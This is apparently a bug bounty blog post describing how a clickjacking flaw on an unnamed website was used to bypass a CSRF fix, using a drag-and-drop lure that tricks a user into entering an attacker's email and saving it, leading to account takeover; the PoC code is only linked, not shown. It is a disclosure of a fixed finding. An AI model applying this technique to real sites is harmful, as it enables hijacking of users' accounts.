Clickjacking to Account Takeover

Clickjacking is an attack in which a user is tricked to click on something that he didn’t intend to, meaning an attacker could possibly make any actions that a user can do on the webapp just like CSRF. But clickjacking requires user interaction to do a following task whereas CSRF requires no interaction as it can be triggered automatically using javascript.

Its considered low finding tbh but if you find a url which has some critical actions like deleting or adding an user, or changing users email then some companies might consider it as a medium/high finding like Google.

So i was looking for bugs on a website and reported a CSRF issue which led to account takeover. After a few weeks they fixed it by adding a CSRF Token/Key on the request like so.

Tried bypassing it with various ways but had no luck, until i discovered that the page is vulnerable to clickjacking. I use a website which helps me know if a url can be clickjacked or not.

Since the url is vulnerable to clickjacking it bypasses all CSRF protection. This page lets me change the name and email of the user which looked like this.

To exploit this i created a page in which the user has to drag something to a box and then a click a button. But what was really happening at the back was that the user was dragging text and putting it in the Email box and then clicking Save Changes which led to account takeover.

The code of the HTML can be found here You can position the finish button and the red blob as your requirement and also change the text in the “DRAG ME TO THE RED BOX” text.

I thought this was enough for POC and the impact was also high, so i sent the report and it got accepted. They fixed and rewarded me pretty quickly.

Hope you learned something.

Thank You.😁

Bug-Bounty | Pentester

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store